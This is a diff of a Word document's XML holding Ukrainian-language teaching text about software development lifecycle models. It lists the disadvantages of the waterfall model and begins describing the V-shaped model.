-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> лінією між прямокутниками V-подібної моделі.</w:t>
+        <w:t>в основі моделі лежить послідовна лінійна структура, в результаті чого кожна спроба повернутися на одну або дві фази назад, щоб виправити будь-яку проблему або недолік, призведе до значного збільшення витрат і збою в графіку;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>вона не може запобігти виникненню ітерацій між фазами, які так часто зустрічаються при розробці ПЗ, оскільки сама модель створюється відповідно до стандартного циклу апаратного інжинірингу;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">вона не відображає основну властивість розробки ПО, спрямоване на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>вирішення задач</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>. Окремі фази строго пов'язані з певними діями, що відрізняється від реальної роботи персоналу або колективів;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>інтеграція всіх отриманих результатів відбувається раптово в завершальній стадії роботи моделі. В результаті такого одиничного проходу через весь процес, пов'язані з інтеграцією проблеми, як правило, дають про себе знати занадто пізно. Отже, виявилися не виявлені раніше помилки або конструктивні недоліки, підвищити ступінь ризику при невеликому завданню часу на відновлення продукту;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>вона може створити помилкове враження про роботу над проектом.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">у клієнта </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>практично немає можливості</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ознайомитися з системою заздалегідь, це відбувається лише в самому кінці життєвого циклу. Клієнт не має можливості скористатися доступними проміжними результатами, і відгуки користувачів не можна передати назад розробникам. Оскільки готовий продукт не доступний аж до закінчення процесу, користувач приймає участь в процесі розробки тільки на самому початку - при зборі вимог, і в кінці - під час приймальних випробувань;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>користувачі не можуть переконатися в якості розробленого продукту до закінчення всього процесу розробки. Вони не мають можливості оцінити якість, якщо не можна побачити готовий продукт розробки;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>у користувача немає можливості поступово звикнути до системи. Процес навчання відбувається в кінці життєвого циклу, коли ПО вже запущено в експлуатацію;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>проект можна виконати, застосувавши впорядковану каскадну модель, і привести його у відповідність з письмовими вимогами, що, однак, не гарантує його запуску в експлуатацію;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>кожна фаза є передумовою для виконання наступних дій, що перетворює такий метод в ризикований вибір для систем, які не мають аналогів, так як він не піддасться гнучкому моделюванню;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>для кожної фази створюються результативні дані, які по його завершенню вважаються замороженими. Це означає, що вони не повинні змінюватися на наступних етапах життєвого циклу продукту. Якщо елемент результативних даних будь-якого етапу змінюється (що зустрічається досить часто), на проект зробить негативний вплив зміна графіка, оскільки ні модель, ні план не були розраховані на внесення та дозвіл зміни на більш пізніх етапах життєвого циклу;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>всі вимоги повинні бути відомі на початку життєвого циклу, але клієнти рідко можуть сформулювати всі чітко задані вимоги на цей момент розробки. Модель не розрахована на динамічні зміни в вимогах протягом усього життєвого циклу, так як ці дані "заморожуються". Використання моделі може спричинити за собою значні витрати, якщо вимоги в недостатній мірі відомі або схильна до динамічних змін під час протікання життєвого циклу;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>виникає необхідність в жорсткому управлінні і контролі, оскільки в моделі не передбачена можливість модифікації вимог;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>модель заснована на документації, а значить, кількість документів може бути надмірною;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>весь програмний продукт розробляється за один раз. Немає можливості розбити систему на частини. В результаті взятих розробниками зобов'язань розробити цілу систему за один раз можуть виникнути проблеми з фінансуванням проекту. Відбувається розподіл великих грошових коштів, а сама модель</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> практично</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>не</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> дозволяє повторно </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>розподілити кошти, не зруйнувавши при цьому проект в процесі його виконання;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>відсутня можливість врахувати переробку і ітерації за рамками проекту.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1526,6 +2679,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -1534,15 +2688,18 @@
         <w:pStyle w:val="a3"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="360"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -1551,6 +2708,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
@@ -1560,138 +2718,375 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> модель, показана </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:strike/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>на рис. 4.10</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, була розроблена як </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>р</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>ізновид</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> каскадної моделі, а значить, успадкувала від неї таку ж послідовну структуру. Кожна наступна фаза починається </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>п</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ісля завершення отримання результативних даних попередньої фази. Модель демонструє комплексний </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>п</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ідхід до визначення фаз процесу розробки ПО. У ній підкреслені взаємозв'язки, що існують між аналітичними фазами і </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>фазами</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>проектування</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, які передують кодування, після якого йдуть фази </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>тестування. Пунктирні лінії означаают, що ці фази необхідно розглядати паралельно.</w:t>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> модель життєвого циклу розробки ПЗ</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>V-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>подібна</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> модель була с</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>творена з метою допомогти працю</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>ючій</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> над проектом команді в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>плануванні</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>і</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>з забезпеченням подальшої можливості тестування системи. У цій моделі особливе значення надається діям, спрямованим на верифікацію і атестацію продукту. Вона демонстру</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>є,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
